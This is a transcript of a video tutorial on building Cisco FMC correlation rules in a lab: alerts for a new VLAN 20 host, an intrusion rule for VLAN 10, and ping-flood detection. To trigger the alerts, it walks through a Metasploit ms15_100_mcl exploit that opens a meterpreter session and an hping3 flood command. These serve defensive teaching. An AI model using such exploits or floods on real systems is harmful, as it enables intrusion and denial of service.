Hi everyone, welcome to my channel, continuing the series SNCF 317. We started with the correlation and we explained what is the correlation policy and what are the types for that. So let's today do the first lap in correlation based on the scenario or some scenarios. Let's go to our topology and here. Great. Um, Okay, so this is here the FMC and go to policy, as we said, correlation. Before starting with the correlation, what we are going to correlate, okay, what the policy we have to do. First of all, let me apply a policy that I will say, for example, you as a security engineer, you care about host to be like any a new IP address detected like in a PC or anything in VLAN 20 to alert you. So for example, let me go add one quick node, uh, add an object node. If I go virtual PC, let's make it, and this is PC in new VLAN 20. Let's name it like this. Okay, where is this PC? It's up here. Come please. No. Okay, put it here. Let's be a little bit organized. Give it a connection over here. So it's connected with 1 over 2. So great. Wipe first. It's better. I'd like to wipe it. Start it. Okay, E1. So we said SMVLAN 20. Okay, I will do the settings later on. Let me go to this management. So first of all, go to role management. I will make it very simple, okay, to understand. So create a role. Name it, for example, a new IP VLAN 20. Great. So select the type of event for this role. So the type, it will be intrusion, of course, no. Discovery event occur, could be, yes. This one. So yes, and it meets the following. Okay, good. Discovery event occurred. A client has it changed. If the client has it changed, no, I don't want it. A host IP address is reused. Could be, no, this is another scenario, not this. Net BIOS name, it changes. A new IP host is detected, or a new client is detected. You can make it like both, okay? But a client, it means you need to log in by username and password, so you need Windows 7 or 10 to do that. But we believe the same concept. So I will simplify it. New IP host is detected. Great. So the rule is like that. When a discovery event occurs, a new IP host is detected, and it meets the following condition. Let me see what is the condition. You want a device, host type, IP address. Um, Click IP address, no problem. So here I don't know what is the IP address. If I put it is to be static, I will not be knowing that. So I will make it as a range, is n. So it will be is n 192.168.20.0/24. Great. So If I want to snooze it, I can do it. If I want to make inactive period for that, I can do it. I don't need to do anything for that. So this is the rule, is very simple. When network discovery is happened and new IP host is detected and the IP address in the range of 20 zeros, because my concern is in VLAN 20. So save. Okay. Go to the PC. Let's go to the switch first. So the interface is E1/2. Great. Conft interface E1/2. Switch port mode access. Switch port access VLAN 20. Spanning tree port fast. Do WR. Okay. Then I assigned it. Let me go to the PC itself. So show IP. This is a PC actually from the Pinet lab. Okay, no IP is taken because I need to type IP DHCP. Great. Dora is trying to DDD. It means it cannot be reached. Okay, there is a problem in the here DHCP server. It cannot do that. Why? Okay. Let me go to the management devices, device management. Okay. Go to interfaces. Let me see the interfaces are up and running or what. Interfaces. Okay, interfaces are not green. So this is the problem. Let me open this. Actually, it's an image problem. It's not related to our topic. Let me pause it and I will come back to you. So let's try. I fixed actually. It was an image issue. Let me IPDHCP. Okay, Dora. So it's now getting the IP address. Great. 20.10. It took 20.10. Let me see where is my. I should receive an email. Okay. I will not receive an email because we forget to do one thing. Inside the policy management, we didn't create the policy management that we want to tie the rule management with the response. So policy management, you can name it new host. Okay, add rule. So it will be a new IPv LAN, the rule that we created. And you see here the default whitelisted here because it's generated already by the system. Add. Okay, so it's here and the response is loading. So the rule does not have any responses. Great. Priority, you can give it an priority or leave it to the default. Give it like priority 1, 4. And here I want to click to add response. So I will click here. The response that I have only now the emails. I didn't create any responses for remediation. So let me send me an email and click the arrow, the up arrow. You can put many responses that you need. Update. So the email is here. Save. Now it's saved, and you need to enable it. Okay, it's enabled right now. Let me see if it will take it right now. Okay, great. Let's go to analysis, correlation. Right click, open to new tab, correlation events. It's 20.11, or this is previously already I generated. Or we can do one thing. Let's IP, okay, IP 192.168.20.15 slash 24. Okay, 192.168.20.1, like that. Checking for duplicate. Okay, great. So show IP. So it's 15. Now it should consider it as an IP address. New one. No, still not in the correlation. Should be in correlation actually. It should be camping. Should be in correlation. Right now, maybe it needs for a trigger. So 20.15 is in the correlation event right now, and there is no anything because it's just okay. So let me check my email. Should receive an email. Yes, great. I receive an email from the FMC. A new host from FTD HQ standby. Blah blah blah. IP address 20.15. Host type host. So we are fine for this. Try to go to. Let's do something related to intrusion, for example. Yes, intrusion. Let me create a new role. What's wrong? Admin. MEC. I don't know why it's logged out by itself, but it's fine. Accept. Close this, I don't want it. Close this, I don't want it. So this is the correlation. 20 to 15 is there. Okay, fine. Go to policy. Go to correlation. Okay. Rule management. Create rule. Things are a little bit slow here, especially when you are dealing with correlations. So, okay. IPS 4, IPS 4, PC VLAN 10. Could be. Okay. So intrusion event occurs. Let me see what are the options that I have. Okay, and meets what? And let me choose here destination IP. Okay, destination IP, because when the attack will come, so I care about destination IP. Okay, is either to give it one host, or you will tell it, like for example, I care about network in 192.168.10.0/24. Okay, and make it simple. So it's here IPS. Go to the policy management. In this case, if you enable the endpoint security service in the eyes, that you can, if this happened, send the PC to the remediation. For example, you can do that. You can now open in this policy and you can map the same, but no, I would like actually to create another policy. Policy name IPS for VLAN 10. Okay, default priority, make it 1. Add rule. Okay, so it will be IPS here. See, I can put many things in one policy, it doesn't matter. Okay, so IPS is here. Priority also 1. Responses, let me send me an email also for the time being. Update. Okay, save. Now it's saved, just I need to enable it, don't forget to enable it. Okay, it's enabled. Let me go to Kali Linux. And let me create the intrusion file that we did it previously. Okay. Search ms15_100_mcl. Use this exploit. Okay, info. I need to change the file name, caps file set file name, name it o.mcl, anything, sorry, caps o.mcl, and set again the same exe file underscore name, set lhost 192.168.30.8, run. So what I care is this one, nxq. Okay, so we go to PC, 192.168.30.8 backslash nx, it was oq backslash o dot exe. Okay, great. So now sessions minus I1. Great. And the correlation, it should happen, it should give me something here, analysis, correlation events, right click, open link. Great. So now when it's 38, try to attack 10.10, so the correlation send me here something, and I should get something in my email as well. Amazing. Here I received two emails. One email from correlation and one email previously I configured when there is an intrusion, send me an email and an syslog and SNME trap. So here send me two things. The first one, this here if we open it, indicator compromise, meter personal, blah, blah, blah. Okay. This is auto-generated email only. The down one is correlation here. You see correlation event. IPS for PC VLAN 10, IPS for VLAN 10. So this is actually what we created. And since you that this indicator, blah, blah, blah. So this is also, yes, as I told you, you can put it like in remediation area, or you can like do whatever action you need. So like this is actually a correlation. Let me apply one more thing. What could be in my mind? Okay, let me create a rule. This rule, if I said track mm, track PC and VLAN 20. Okay, here I want something related to connection event. There is nothing called here for security intelligent. There is, it will be inside the connection event. They made it like this, okay? Like if the event in the connection, either the beginning or end of the connection, or at the beginning or at the end. No, I need it to be for both. Okay. If initiator IP, okay. If initiator IP will be the hacker, so the Kali line is machine 192.168.30.8. Okay. And let me here add a tracker for you to show you how I can. Okay. When I add the tracker here, start tracking connection if it's meet like what? If the responder IP, wait, not security intelligence. If the responder IP and down. Okay, if the responder IP is 192.168.20.10, the new PCE that we have, okay, and the total initiator responder packets, let me say. I will explain it in a while. Just let me finish the statement. Okay, down, and the responder packets are 5. What does this mean? if I care about, like, as you know, that there are several, like ping considered, if you studied hacking, ping considered as a hacker tool, like, as a hacking tool. Why? Because you are discovering if this IP address is alive on the network or not. So there is also attack called ping flood attack. There is another attack called send flood attack. Okay, start sending for you the sing. Then, like, for the ping flood attack, the intrusion detection system, like, will not be catch it because it's a ping and you allow the ping in your access policy. Okay, so this type of attack does not have a signature. So this is also the beauty in the correlation. So what I'm saying is, if the connection event, the initiator IP, the IP, this one, initiate the traffic here, and the responder IP, and you know that the ping is echo and echo reply. If I ping Google, so the first one ping, after that ping reply, ping reply, right? So if the responder packets, then like the PC in VLAN replied, are greater than or equal. Let's make it greater than or equal 5. So 5 pings or 5 packets, then send me an alert. Or you can drop the connection. Save it. And let me go to, no, before go to that, let me go to the policy management to tie it with it. Create policy. So policy is ping flood attack. You can do it for your entire network, by the way. Default priority to any numbers. You can put it here. Track track PC. Okay. Add. Send me a response. Take it up. Update. Save. Great. I guess that the PC, new PC, this one, what is the IP is 20.15, right? Show IP to make sure. Okay. 20.IP. And what I put the IP address here. Track. Okay. So the responder will be 15 here. Okay. 15, save. Okay. And I need to enable it in the policy management. I think we forget to do that. Ping float. Yes, make it enable. Oh my god. I don't know what is the problem with this version. It's coming to correlation. It's going outside. Did not save. Okay, it has been failure. Great. Uh, it saved the last action. What I did, I enabled the policy last one. Still not enabled. Yeah, it's enabled right now. So great. So I will do normal ping. Where is the hacker? Here. Okay, here it's denied by IPS. Great. Exit. Clear. Okay. If I do hping 3, now let's make it normal ping, not hping. Ping 192.168.20.15, because the Linux, when you do a normal ping, it's start ping continuously until you stop it. Okay, 2, 3, 4, 5, 6. By this, it should be like generated the events for us. Let's see. Analysis, correlation. Mm, no. Why? It should be. It should be. Let me check email if I have email. No, even email I don't have. Oh, I have email now. Correlation. Event track PC in VLAN 20. Ping flood attack. Great. PC 30.8. 192.20 unknown ICMP. Great. So maybe it will need some time for here to appear. But send me an email, it means it's working. But it should be appear here. Should appear here. Here, now it's appeared. From 30.8 to 50. So this is here in the correlation. Imagine like flood of ping and all these like can cause denial of service attack, because you are consuming the resources of the victim machine, okay, or the second party. Imagine that we have here DMZ server. If I want to make this DMC server to be filled down, yes, it will be down. And this is actually a very good example, because IPS cannot catch this because it's a normal ping, and you allow the ping in your between the interVLAN routing from your FTD from your firewall. So if I put like a ping for you, like with a load for that, then a lot of replies. Or if I did something called sync flood attack, okay, to send you like the TCP is uh, send send ACK, right? So if I send you like send several times, and you have to reply for me, and imagine like how much is fast. And believe me, like the hacker has a lot of hacking tool, still pinging. Just let me close it. If you can put like there is something called hping 3 -1, as I remember, -c fast 192.168. I believe this was the command 20.15 count 0. It was, yes, I remember it. Hping 3 -1 minus fast 192.168 dot 20.15 minus h ping minus 1 minus minus fast 192.16 8 dot 20.15 30 dot 200. Okay, try imagine like how much the pings are fasting, and it will be continuous for that. Okay, you want it faster, just write faster. So imagine also if you put like it will be denial of service attack, obviously. So like this, you see the ping are here and there. The IPS cannot catch it. Of course, there are like we can optimize our this thing through limited through quality of service or something like that. Yes, I know that, but this is the best way to do it. So this is actually. I hope the idea is very clear for you with the correlation using the rules or the correlation rules. We applied three scenarios. You can try to check the features available and you can do it your way. And again, it's case by case. It depends on your infrastructure and what you need exactly. I hope you like this video. Please, for supporting this channel, do not forget to subscribe, like, and share, and see you next one. Thank you. Bye bye.